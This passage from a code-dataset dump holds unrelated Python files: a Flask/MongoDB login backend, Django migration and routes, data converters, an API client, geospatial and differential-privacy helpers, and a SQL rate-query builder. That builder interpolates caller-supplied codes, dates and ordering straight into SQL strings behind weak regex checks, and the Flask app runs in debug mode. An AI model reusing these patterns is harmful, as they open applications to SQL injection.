returnObject = createLoginSuccessObject(username=username)\n        return jsonify(returnObject), result['statusCode']\n\n\n# validates projectID\ndef checkProjectinDB(projectID):\n    try:\n        # Connect to database\n        client = MongoClient(MONGO_URI, tlsCAFile=ca)\n        db = client[DB_NAME]\n        # getting the collection\n        projectCollection = db['Projects']\n\n        # check that the project collection is not empty -> skip the lookup when there are no projects\n        if len(list(projectCollection.find())) != 0:\n            # check if the project exists in the db\n            project = projectCollection.find_one({'projectID': projectID})\n\n            if project is not None:\n                if project['projectID'] == projectID:\n                    client.close()\n                    resultObject = {\n                        'isError': False,\n                        'statusCode': 200,\n                        'message': f'Joined Project: {projectID} successfully!'\n                    }\n                    return resultObject\n            else:\n                client.close()\n                resultObject = {\n                    'isError': True,\n                    'statusCode': 404,\n                    'message': f'ProjectID {projectID} does not exist! Enter a valid projectID.'\n                }\n                return resultObject\n\n        else:\n            client.close()\n            resultObject = {\n                'isError': True,\n                'statusCode': 404,\n                'message': 'There are no projects in the database.'\n            }\n            return resultObject\n\n    except PyMongoError as e:\n        # Handle database-related errors\n        client.close()\n        resultObject = {\n            'isError': True,\n            'statusCode': 700,\n            'message': 'Database error: ' + str(e)\n        }\n        return resultObject\n\n    except Exception as e:\n        # Handle other exceptions\n        client.close()\n        resultObject = {\n            'isError': True,\n            'statusCode': 500,\n            'message': 'Server error: ' + str(e)\n        }\n        return resultObject\n\n\n# TODO: move into different files\n# make utility functions\n# make a standard object creation function\n# route for login\n@app.route('/api/login', methods=['POST'])\ndef login_user():\n    # storing the request object\n    username = request.json['username']\n    password = request.json['password']\n\n    result = checkUserInDB(username=username, password=password)\n\n    if result['isError']:\n        returnObject = createErrorObject(\n            statusCode=result['statusCode'], message=result['message'])\n        return jsonify(returnObject), result['statusCode']\n    else:\n        returnObject = createSuccessObject(\n            statusCode=result['statusCode'], message=result['message'])\n        # TODO:\n        # returnObject = createLoginSuccessObject(username=username)\n        return jsonify(returnObject), result['statusCode']\n\n\n# validates username and password\ndef checkUserInDB(username, password):\n    try:\n        # Connect to database\n        client = MongoClient(MONGO_URI, tlsCAFile=ca)\n        db = client[DB_NAME]\n        # getting the collection\n        usersCollection = db[USERS_COLLECTION]\n\n        # check that the collection is not empty -> skip the lookup when there are no users\n        if len(list(usersCollection.find())) != 0:\n            # check if the user exists and then validate the encrypted password against the one stored in the db\n            user = usersCollection.find_one({'username': username})\n            if user:\n                passwordFromDB = user.get('password')\n                if passwordValidation(\n                        passwordFromDB=passwordFromDB, passwordFromRequest=password):\n                    client.close()\n                    resultObject = {\n                        'isError': False,\n                        'statusCode': 200,\n                        'message': 'Logged in successfully!'\n                    }\n                    return resultObject\n                # if password is wrong, return error object\n                else:\n                    client.close()\n                    resultObject = {\n                        'isError': True,\n                        'statusCode': 401,\n                        'message': 'Username or Password is wrong. Please try again!'\n                    }\n                    return resultObject\n            # if username is wrong, return error object\n            else:\n                client.close()\n                resultObject = {\n                    'isError': True,\n                    'statusCode': 401,\n                    'message': 'Username or Password is wrong. Please try again!'\n                }\n                return resultObject\n        # if there is no user in db, return error\n        else:\n            client.close()\n            resultObject = {\n                'isError': True,\n                'statusCode': 404,\n                'message': 'Users not found! Database has no users registered yet.'\n            }\n            return resultObject\n    except PyMongoError as e:\n        # Handle database-related errors\n        client.close()\n        resultObject = {\n            'isError': True,\n            'statusCode': 700,\n            'message': 'Database error: ' + str(e)\n        }\n        return resultObject\n    except Exception as e:\n        # Handle other exceptions\n        client.close()\n        resultObject = {\n            'isError': True,\n            'statusCode': 500,\n            'message': 'Server error: ' + str(e)\n        }\n        return resultObject\n\n\n# this function validates the passwords from request and db\ndef passwordValidation(passwordFromDB, passwordFromRequest):\n    # encode the password from request\n    passwordFromRequest = passwordFromRequest.encode('utf-8')\n    # use the checkpw function to validate the two passwords and return a bool value\n    return bcrypt.checkpw(passwordFromRequest, passwordFromDB)\n\n\n# TODO: move into different files\n# make utility functions\n# make a standard object creation function\n# register user\n# route for register\n@app.route('/api/register', methods=[\"POST\"])\ndef register_user():\n    # storing the request object\n    username = request.json['username']\n    password = request.json['password']\n\n    result = addUser(username=username, password=password)\n\n    if result['isError']:\n        returnObject = createErrorObject(\n            statusCode=result['statusCode'], message=result['message'])\n        return jsonify(returnObject), result['statusCode']\n    else:\n        returnObject = createSuccessObject(\n            statusCode=result['statusCode'], message=result['message'])\n        return jsonify(returnObject), result['statusCode']\n\n\n# add user to db\ndef addUser(username, password):\n    try:\n        # Connect to database\n        client = MongoClient(MONGO_URI, tlsCAFile=ca)\n        db = client[DB_NAME]\n        # getting the collection\n        usersCollection = db['Users']\n\n        # only check for duplicates when the collection is not empty -> allows the very first user registration\n        if len(list(usersCollection.find())) != 0:\n            # checking for the username passed in the request, if already exists, return an object with an error\n            if usersCollection.find_one({'username': username}):\n                client.close()\n                resultObject = {\n                    'isError': True,\n                    'statusCode': 409,\n                    'message': 'User already exists'\n                }\n                return resultObject\n\n        # create a new user\n        newUser = {\n            'username': username,\n            'password': encrypt(password),\n        }\n\n        # insert user in the users collection\n        usersCollection.insert_one(newUser)\n        client.close()\n        # return the success object\n        resultObject = {\n            'isError': False,\n            'statusCode': 201,\n            'message': 'User added successfully!',\n        }\n        return resultObject\n    except PyMongoError as e:\n        # Handle database-related errors\n        client.close()\n        resultObject = {\n            'isError': True,\n            'statusCode': 700,\n            'message': 'Database error: ' + str(e)\n        }\n        return resultObject\n\n    except Exception as e:\n        # Handle other exceptions\n        client.close()\n        resultObject = {\n            'isError': True,\n            'statusCode': 500,\n            'message': 'Server error: ' + str(e)\n        }\n        return resultObject\n\n\n# this function encrypts the text passed to it\n# converts into binary\n# adds salt\n# hashes the text and salt together\ndef encrypt(text):\n    # converting text to an array of bytes\n    bytes = text.encode('utf-8')\n    # generating the salt\n    salt = bcrypt.gensalt()\n    # Hashing the text\n    hash = bcrypt.hashpw(bytes, salt)\n    return hash\n\n\nif __name__ == '__main__':\n    
app.run(debug=True)\n","repo_name":"argh15/apad-project-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":26809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42900177464","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ticker', '0015_auto_20160910_2247'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='game',\n name='presses_json',\n field=models.TextField(default=None, blank=True, null=True),\n ),\n ]\n","repo_name":"meyerjo/ticker","sub_path":"ticker/migrations/0016_bup_presses.py","file_name":"0016_bup_presses.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70980129706","text":"import os\r\nimport json\r\nimport pandas as pd\r\n\r\ntest = False\r\ndata_dir = '../../data/TrainingData/clean_squad/'\r\ncsv_name = 'full_train.csv'\r\ncolumns = ['id', '文章', '問題', '選項1', '選項2', '選項3', '選項4', '答案']\r\n\r\n\r\ndef create_qa_item(row):\r\n if not test:\r\n answer_text = row['選項{}'.format(row['答案'])]\r\n answer_start = row['文章'].index(answer_text)\r\n answers = [{\r\n 'text': answer_text,\r\n 'answer_start': answer_start,\r\n 'is_impossible': False,\r\n }]\r\n\r\n qa_item = {\r\n 'question': row['問題'],\r\n 'id': row['id'],\r\n 'answers': answers,\r\n }\r\n else:\r\n qa_item = {\r\n 'question': row['問題'],\r\n 'id': row['id'],\r\n }\r\n return qa_item\r\n\r\n\r\ndef create_article(qa_list, context):\r\n paragraph = [{\r\n 'qas': qa_list,\r\n 'context': context,\r\n }]\r\n # only one paragraph per article\r\n article = {\r\n 'title': \"\",\r\n 'paragraphs': paragraph,\r\n }\r\n return article\r\n\r\n\r\ndef create_data_dict(df):\r\n data_list = []\r\n qa_list = []\r\n last_context = None\r\n for _, row in df.iterrows():\r\n context = row['文章']\r\n if context != last_context:\r\n data_list.append(create_article(qa_list, last_context))\r\n qa_list.clear()\r\n last_context = context\r\n qa_list.append(create_qa_item(row))\r\n data_dict = {\r\n 'version': 'v2.0',\r\n 'data': data_list,\r\n }\r\n return data_dict\r\n\r\n\r\nif __name__ == \"__main__\":\r\n df = pd.read_csv(os.path.join(data_dir, csv_name))\r\n data_dict = create_data_dict(df)\r\n\r\n with open(os.path.join(data_dir, csv_name.split('.')[0] + '.json'), 'w') as f:\r\n json.dump(data_dict, f)\r\n","repo_name":"a7532ariel/2019NLP_QA","sub_path":"utils/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41586292540","text":"from functools import lru_cache\nimport os\n\nimport honeycomb_io\nimport minimal_honeycomb\n\n\nclass HoneycombCachingClient:\n __instance = None\n\n def __new__(cls):\n if cls.__instance is None:\n cls.__instance = super().__new__(cls)\n return cls.__instance\n\n def __init__(\n self,\n url=None,\n auth_domain=None,\n auth_client_id=None,\n auth_client_secret=None,\n auth_audience=None,\n ):\n url = os.getenv(\"HONEYCOMB_URI\", \"https://honeycomb.api.wildflower-tech.org/graphql\") if url is None else url\n auth_domain = (\n os.getenv(\"HONEYCOMB_DOMAIN\", os.getenv(\"AUTH0_DOMAIN\", \"wildflowerschools.auth0.com\"))\n if auth_domain is None\n else auth_domain\n )\n auth_client_id = (\n os.getenv(\"HONEYCOMB_CLIENT_ID\", 
os.getenv(\"AUTH0_CLIENT_ID\", None))\n if auth_client_id is None\n else auth_client_id\n )\n auth_client_secret = (\n os.getenv(\"HONEYCOMB_CLIENT_SECRET\", os.getenv(\"AUTH0_CLIENT_SECRET\", None))\n if auth_client_secret is None\n else auth_client_secret\n )\n auth_audience = (\n os.getenv(\"HONEYCOMB_AUDIENCE\", os.getenv(\"API_AUDIENCE\", \"wildflower-tech.org\"))\n if auth_audience is None\n else auth_audience\n )\n\n if auth_client_id is None:\n raise ValueError(\"HONEYCOMB_CLIENT_ID (or AUTH0_CLIENT_ID) is required\")\n if auth_client_secret is None:\n raise ValueError(\"HONEYCOMB_CLIENT_SECRET (or AUTH0_CLIENT_SECRET) is required\")\n\n token_uri = os.getenv(\"HONEYCOMB_TOKEN_URI\", f\"https://{auth_domain}/oauth/token\")\n\n self.client: minimal_honeycomb.MinimalHoneycombClient = honeycomb_io.generate_client(\n uri=url,\n token_uri=token_uri,\n audience=auth_audience,\n client_id=auth_client_id,\n client_secret=auth_client_secret,\n )\n\n self.client_params = {\n \"client\": self.client,\n \"uri\": url,\n \"token_uri\": token_uri,\n \"audience\": auth_audience,\n \"client_id\": auth_client_id,\n \"client_secret\": auth_client_secret,\n }\n\n @lru_cache(maxsize=50)\n def fetch_camera_devices(self, environment_id=None, environment_name=None, start=None, end=None, chunk_size=200):\n return honeycomb_io.fetch_devices(\n device_types=honeycomb_io.DEFAULT_CAMERA_DEVICE_TYPES,\n environment_id=environment_id,\n environment_name=environment_name,\n start=start,\n end=end,\n output_format=\"dataframe\",\n chunk_size=chunk_size,\n **self.client_params,\n )\n\n @lru_cache(maxsize=100)\n def fetch_camera_calibrations(self, camera_ids: tuple, start=None, end=None, chunk_size=100):\n return honeycomb_io.fetch_camera_calibrations(\n camera_ids=list(camera_ids), start=start, end=end, chunk_size=chunk_size, **self.client_params\n )\n\n @lru_cache(maxsize=50)\n def fetch_camera_info(self, environment_name, start=None, end=None, chunk_size=100):\n return honeycomb_io.fetch_camera_info(\n environment_name=environment_name, start=start, end=end, chunk_size=chunk_size\n )\n\n @lru_cache(maxsize=20)\n def fetch_environment_by_name(self, environment_name):\n return honeycomb_io.fetch_environment_by_name(environment_name)\n\n @lru_cache(maxsize=50)\n def fetch_environment_id(self, environment_name):\n return honeycomb_io.fetch_environment_id(environment_name=environment_name)\n\n def get_environment_id(self, environment_id=None, environment_name=None):\n if environment_id is not None:\n return environment_id\n\n return self.fetch_environment_id(environment_name=environment_name)\n\n @lru_cache()\n def fetch_all_environments(self):\n return honeycomb_io.fetch_all_environments(output_format=\"dataframe\", **self.client_params)\n\n @lru_cache(maxsize=10)\n def fetch_device_ids(\n self,\n environment_id=None,\n environment_name=None,\n device_types: tuple = None,\n device_ids: tuple = None,\n part_numbers: tuple = None,\n serial_numbers: tuple = None,\n start=None,\n end=None,\n chunk_size=200,\n ):\n return honeycomb_io.fetch_device_ids(\n device_types=list(device_types) if device_types else None,\n device_ids=list(device_ids) if device_ids else None,\n part_numbers=list(part_numbers) if part_numbers else None,\n serial_numbers=list(serial_numbers) if serial_numbers else None,\n tag_ids=None,\n names=None,\n environment_id=environment_id,\n environment_name=environment_name,\n start=start,\n end=end,\n chunk_size=chunk_size,\n **self.client_params,\n )\n\n @lru_cache(maxsize=200)\n def fetch_persons(self, 
person_ids: tuple = None):\n        return honeycomb_io.fetch_persons(\n            person_ids=list(person_ids) if person_ids else None,\n            output_format=\"dataframe\",\n            **self.client_params,\n        )\n","repo_name":"WildflowerSchools/wf-process-cuwb-data","sub_path":"process_cuwb_data/honeycomb_service/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12080231366","text":"import math\nfrom functools import partial\nimport geopandas as gpd\nimport pyproj\nfrom shapely.ops import nearest_points, transform\nfrom shapely.geometry import Polygon, Point\n\n\ndef dist_to_nearest_neighbour(df, epsg=3857):\n\n    \"\"\"\n    Computes the minimum distance to the nearest neighbouring ATM\n    \n    df -- GeoDataFrame with ATM data\n    epsg -- desired projection of the GeoDataFrame (default: Pseudo-Mercator)\n    \"\"\"\n\n    df = df.copy().to_crs(epsg)\n    for index, row in df.iterrows():\n        point = row[\"geometry\"]\n        multipoint = df.drop(index, axis=0)[\"geometry\"].unary_union\n        _, nearest_geom = nearest_points(point, multipoint)\n        df.loc[index, \"nearest_neighbour_atm\"] = nearest_geom.distance(point)\n\n    return df\n\n\ndef geodesic_point_buffer(lon, lat, m):\n\n    \"\"\"\n    Draws a correct buffer around a point, taking the projection into account\n    \n    lon, lat -- longitude and latitude of the point\n    m -- buffer radius in metres\n    \"\"\"\n\n    proj_wgs84 = pyproj.Proj(\"+proj=longlat +datum=WGS84\")\n\n    aeqd_proj = \"+proj=aeqd +lat_0={lat} +lon_0={lon} +x_0=0 +y_0=0\"\n    project = partial(\n        pyproj.transform, pyproj.Proj(aeqd_proj.format(lon=lon, lat=lat)), proj_wgs84\n    )\n\n    buf = Point(0, 0).buffer(m)\n\n    return transform(project, buf)\n\n\ndef points_in_buffer(point_df, poly_df, name, m=250):\n\n    \"\"\"\n    Counts the number of points from point_df inside each polygon of poly_df\n\n    point_df -- GeoDataFrame with infrastructure objects\n    poly_df -- GeoDataFrame with the main ATM information\n    m -- radius of the buffer\n    \"\"\"\n\n    # compute the buffer\n    poly_df[\"{}m_buffer\".format(m)] = poly_df[\"geometry\"].buffer(m)\n    # switch the geometry from points to polygons (the buffers)\n    poly_df.set_geometry(\"{}m_buffer\".format(m), inplace=True)\n\n    # count the number of points from point_df in each polygon of poly_df\n    pts_in_poly = gpd.sjoin(point_df, poly_df, how=\"left\")\n    pts_in_poly[\"const\"] = 1\n    counter = pts_in_poly.groupby(\"index_right\")[\"const\"].sum()\n    counter.name = \"{}_in_{}m\".format(name, m)\n\n    # drop the buffer column and restore the original geometry\n    poly_df.drop(\"{}m_buffer\".format(m), axis=1, inplace=True)\n    poly_df.set_geometry(\"geometry\", inplace=True)\n\n    return counter\n\n\ndef find_epsg(lon, lat):\n    \"\"\"Finds the correct EPSG code for a given longitude and latitude\"\"\"\n\n    zone = (math.floor((lon + 180) / 6)) + 1\n    epsg_code = 32600\n    epsg_code += int(zone)\n    if lat < 0:\n        epsg_code += 100\n    return epsg_code\n","repo_name":"jeromeshan/hse-mlds-atm","sub_path":"checkpoints-tasks/checkpoint-2/custom_functions.py","file_name":"custom_functions.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40538330566","text":"\"\"\"Module containing the class that queries the csv file\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nclass PrivateQuery():\n    \"\"\"Private Query is a class that executes differentially private queries\n\n    Parameters\n    ----------\n    path_to_dataset: str\n        Path to dataset\n    epsilon : double\n        Level of Differential Privacy\n    names : list\n        Column names used when reading the csv file\n    use_laplace : bool\n        Use Laplace noise if True, otherwise Gaussian noise\n    demo_mode : bool\n        If True, queries return both the true and the noisy result\n    \"\"\"\n\n    def __init__(self, path_to_dataset, epsilon, names, use_laplace=True, demo_mode=False):\n        self.dataset = pd.read_csv(path_to_dataset, names=names, index_col=False)\n        self.epsilon = epsilon\n        self.cont_col, self.cat_col = self.preprocess()\n        self.use_laplace = use_laplace\n        self.demo_mode = demo_mode\n    \n    def preprocess(self, max_card=20, dep_var=None):\n        \"\"\"\n        Helper function that returns column names of cont and cat variables from given df.\n        Copied from https://github.com/fastai/fastai/blob/master/fastai/tabular/transform.py\n        \"\"\"\n        cont_names, cat_names = [], []\n        for label in self.dataset:\n            if label == dep_var: continue\n            if (self.dataset[label].dtype == int and self.dataset[label].unique().shape[0] > max_card) or \\\n                (self.dataset[label].dtype == float):\n                cont_names.append(label)\n            else:\n                cat_names.append(label)\n        return cont_names, cat_names\n\n\n    def count(self):\n        \"\"\"Returns a differentially private count of rows in the database\"\"\"\n        if not self.demo_mode: return len(self.dataset) + self.get_noise()\n        else: return (len(self.dataset), len(self.dataset) + self.get_noise())\n\n    def get_noise(self):\n        \"\"\"Returns Laplace (or Gaussian) noise with scale 1/epsilon\"\"\"\n        if self.use_laplace:\n            noise = np.random.laplace(scale=1/self.epsilon)\n        else:\n            noise = np.random.normal(scale=1/self.epsilon)\n        \n        return noise\n\n    def categorical_count(self, col_name):\n        \"\"\"Returns a differentially private count of categorical values \n        \n        Parameters\n        ----------\n        col_name : str\n            Name of column\n        \"\"\"\n        # Step 1 - Count the number of rows in each category\n        col_dict = {}\n\n        for i in range(len(self.dataset)):\n            try:\n                col_dict[self.dataset.iloc[i][col_name]] += 1\n            except KeyError:\n                col_dict[self.dataset.iloc[i][col_name]] = 1\n\n        # Step 2 - Add noise to the distribution\n        if self.demo_mode:\n            col_dict_w_noise = col_dict.copy()\n            for keys in col_dict_w_noise:\n                col_dict_w_noise[keys] += self.get_noise()\n            return (col_dict, col_dict_w_noise)\n        else:\n            for keys in col_dict:\n                col_dict[keys] += self.get_noise()\n            return col_dict\n    \n\n    def average(self, col_name):\n        \"\"\"Returns differentially private average of continuous values\n        \n        Parameters\n        ----------\n        col_name : str\n            Name of the column whose average is to be calculated\n        \"\"\"\n        # Compute the true average\n        total = 0\n        for i in range(len(self.dataset)):\n            total += self.dataset.iloc[i][col_name]\n        \n        avg = total/len(self.dataset)\n\n        if self.demo_mode:\n            return (avg, avg + self.get_noise())\n        else:\n            return avg + self.get_noise()\n","repo_name":"vijayantajain/Differential-Privacy","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"3521321176","text":"from pygooglenews import GoogleNews\n\n\ndef main():\n    gn = GoogleNews(lang='en', country='US')\n    n = gn.search(\"AAPL\", when=\"1m\")\n\n    print(type(n[\"entries\"]))\n\n\nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"davidknight00/stockInfinity","sub_path":"stockInfinity/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"24199652386","text":"import re\nfrom string import Template\n\n\n# This query will 
be used if one of source/destination is a port\nport_query = lambda port_code: f\"\"\"\nselect code from ports where ports.code = '{port_code}'\n\"\"\"\n\n\n# This query will be used if one of source/destination is a region, to fetch all the port codes recursively\nregion_query = lambda region_code: f\"\"\"\nwith RECURSIVE children AS (\n select slug, name, parent_slug from regions where slug = '{region_code}'\n union\n select r.slug, r.name, r.parent_slug \n from regions r inner join children as c \n on r.parent_slug = c.slug \n)\nselect p.code from children c\njoin ports p on p.parent_slug = c.slug\n\"\"\"\n\n\nclass RateQuery:\n \"\"\"\n This class provides an abstraction over the rates query that will be used to fetch the prices,\n providing methods to manipulate the query according to filters, ordering and pagination.\n\n It has two properties, \n - query: Outputs the final query to fetch the results.\n - counter_query: Outputs the query to find the total_count.\n\n Example Usage: \n ```\n rate_query = RateQuery().add_source_destination_filter(\n source=\"CNGGZ\", destination=\"northern_europe\"\n ).add_dates_filter(\n date_from=\"2016-01-1\"\n ).add_pagination_params(\n 1, 20\n ).add_ordering(\n 'dd'\n )\n ```\n \n Example Query:\n ```\n with base as ( \n select day, (\n case \n when count(*) < 3 then null else round(avg(price))\n end\n ) as avg_price from prices\n WHERE orig_code in (\n with RECURSIVE children AS (\n select slug, name, parent_slug from regions where slug = 'china_main'\n union\n select r.slug, r.name, r.parent_slug \n from regions r inner join children as c \n on r.parent_slug = c.slug \n )\n select p.code from children c\n join ports p on p.parent_slug = c.slug\n \n )\n and dest_code in (\n with RECURSIVE children AS (\n select slug, name, parent_slug from regions where slug = 'northern_europe'\n union\n select r.slug, r.name, r.parent_slug \n from regions r inner join children as c \n on r.parent_slug = c.slug \n )\n select p.code from children c\n join ports p on p.parent_slug = c.slug\n \n )\n group by day\n ),\n min_max_dates as (\n select max(day) as max_date, min(day) as min_date from base\n ),\n date_range as (\n SELECT date_trunc('day', dd):: date as dd\n FROM generate_series((select min_date from min_max_dates)::timestamp , (select max_date from min_max_dates)::timestamp, '1 day'::interval) dd\n )\n select dd, avg_price from base right join date_range on base.day = date_range.dd;\n ```\n \"\"\"\n\n code_pattern = r'[A-Z]{5}'\n region_slug_pattern = r'[a-z_]+'\n\n @classmethod\n def is_port(cls, port_or_region: str):\n return re.match(cls.code_pattern, port_or_region)\n\n @classmethod\n def is_region(cls, port_or_region: str):\n return re.match(cls.region_slug_pattern, port_or_region)\n\n def __init__(self) -> None:\n # Base query template, will be subsituted by filtering clause. 
\n self._base_query_template = Template(\n f\"\"\"\n with base as ( \n select day, (\n case \n when count(*) < 3 then null else round(avg(price))\n end\n ) as avg_price from prices\n $filter_clause\n group by day\n ),\n min_max_dates as (\n select max(day) as max_date, min(day) as min_date from base\n ),\n date_range as (\n SELECT date_trunc('day', dd):: date as dd\n FROM generate_series((select min_date from min_max_dates)::timestamp , (select max_date from min_max_dates)::timestamp, '1 day'::interval) dd\n ) \n \"\"\"\n )\n\n # Result query template, will be subsituted by ordering and pagination clauses.\n self._result_query_template = Template(\"\"\" \n select dd, avg_price from base right join date_range on base.day = date_range.dd $ordering_clause $pagination_clause;\n \"\"\"\n )\n\n # Counter query template, will be subsituted by ordering and pagination clauses.\n self._count_query = \"select count(*) from base right join date_range on base.day = date_range.dd\";\n\n # Cached property for result query\n self._query = ''\n \n # Private properties will store filtering, ordering clauses that will be applied later.\n self._filters = []\n self._ordering = []\n self._page = None\n self._page_size = None\n\n def _finalize(self):\n \"\"\"\n Method to finalize the result query.\n \"\"\"\n self._query = self._base_query_template.substitute(\n filter_clause=self.apply_filters(), \n )\n self._query = self._query + self._result_query_template.substitute(\n ordering_clause=self.apply_ordering(),\n pagination_clause=self.apply_pagination()\n )\n\n return self\n\n def apply_filters(self):\n filter_clause=''\n filters = filter(lambda f: f, self._filters)\n if filters:\n filter_clause = 'WHERE ' + '\\nand\\n'.join(filters)\n \n return filter_clause\n\n def apply_ordering(self):\n ordering_clause = ''\n if self._ordering:\n ordering_clause = ' '.join([\n 'ORDER BY', \n ', '.join(\n [' '.join([order_column, order]) for order_column, order in self._ordering]\n )\n ])\n \n return ordering_clause\n\n def apply_pagination(self):\n pagination_clause = ''\n if self._page or self._page_size:\n self._page = self._page or 1\n self._page_size = self._page_size or 10\n pagination_clause = f'LIMIT {self._page_size} OFFSET {(self._page - 1) * self._page_size}'\n return pagination_clause\n\n def add_ordering(self, ordering: str, order: str='ASC'):\n self._ordering.append((ordering, order))\n return self\n\n def add_source_destination_filter(self, source: str, destination: str):\n source_query = port_query(source) if self.is_port(source) else region_query(source)\n destination_query = port_query(destination) if self.is_port(destination) else region_query(destination)\n \n self._filters.append(f\"orig_code in ( {source_query})\")\n\n self._filters.append(f\"\"\"dest_code in (\n {destination_query}\n )\"\"\"\n )\n return self\n\n def add_dates_filter(self, date_from: str=None, date_to: str=None):\n query_components = []\n if date_from:\n query_components.append(f\"day >= '{date_from}'\")\n if date_to:\n query_components.append(f\"day <= '{date_to}'\")\n\n self._filters.append(\" and \".join(query_components))\n return self\n\n def add_pagination_params(self, page: int = 1, page_size: int = 10):\n if page:\n self._page = page\n if page_size:\n self._page_size = page_size\n return self \n\n\n @property\n def query(self):\n self._finalize() \n return self._query\n\n @property\n def counter_query(self):\n return self._base_query_template.substitute(\n filter_clause=self.apply_filters(), \n ) + 
self._count_query","repo_name":"deb999983/xeneta_ratestask","sub_path":"app/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29663445954","text":"#!/user/baojiong/projects/pycharmprojects/env/python\n\n# encoding: utf-8\n\nfrom django.urls import path, re_path\nfrom . import views\n\nurlpatterns = [\n #path('', views.home_page, name='home'),\n re_path(r'^$', views.home_page, name='home'),\n re_path(r'^lists/(\\d+)/$', views.view_list, name='view_list'),\n path('lists/new', views.new_list, name='new_list'),\n re_path(r'^lists/(\\d+)/add_item$', views.add_item, name='add_item')\n # path('lists/2/add_item', views.add_item, name='add_item')\n]\n","repo_name":"baojiong/superlists","sub_path":"lists/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37157909695","text":"#!/usr/bin/env python2\n\nimport csv\n\n\"\"\" Converts a string read from a file or stdin to a dictionary \"\"\"\ndef lineToDict(line):\n for row in csv.reader([line]):\n return {'id': row[0], 'desc': row[1], 'form': row[2], 'qty': row[3]}\n\n\"\"\" Converts a dictionary object back into a CSV-separated string \"\"\"\ndef dictToLine(dict):\n string = \"\"\n for key in ['id', 'desc', 'form', 'qty']:\n string += dict[key]\n string += \",\"\n return string.rstrip(\",\")\n\n \n","repo_name":"matthazinski/ece2524","sub_path":"hw4/parserecord.py","file_name":"parserecord.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32824120573","text":"from typing import Tuple, Union\n\nimport torch\nfrom torchvision.transforms import ToTensor as ImageToTensor\n\nfrom data.transforms import (\n MaskToTensor,\n DynamicSquareCrop,\n Resize,\n stabilized_padding,\n)\nfrom data.Human36M.skeleton import JOINTS\nfrom data.Human36M.statistics import MEDIAN_PIXEL\n\nfrom geometry.extrinsic import world_to_camera\n\n\nclass Human36MImageTransform(object):\n def __init__(\n self,\n cr_margin: float = None,\n re_size: Union[int, Tuple[int, int]] = None,\n ):\n self.i2t = ImageToTensor()\n self.m2t = MaskToTensor()\n\n self.crop = None\n if cr_margin is not None:\n self.crop = DynamicSquareCrop(margin=cr_margin)\n\n self.resize = None\n if re_size is not None:\n self.resize = Resize(size=re_size)\n\n def __call__(self, input: dict) -> dict:\n p = input[\"pose_2d\"]\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[\"pose_2d\"] = {\n \"p\": p,\n \"c\": c,\n }\n\n p = input[\"pose_3d\"]\n p = world_to_camera(\n xyz=p,\n R=input[\"R\"][None, :, :],\n t=input[\"t\"][None, :, :],\n )\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[\"pose_3d\"] = {\n \"root\": {\n \"p\": p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n \"relative\": {\n \"p\": p - p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c & c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n }\n\n x_off, y_off = 0.0, 0.0\n if self.crop:\n p, c = input[\"pose_2d\"][\"p\"], input[\"pose_2d\"][\"c\"]\n points = p[c.expand_as(p)].reshape(-1, 2, 1)\n points = points if len(points) > 0 else p\n (m, _), (M, _) = points.min(dim=-3), points.max(dim=-3)\n x_m, y_m = m.squeeze(dim=-1).tolist()\n x_M, 
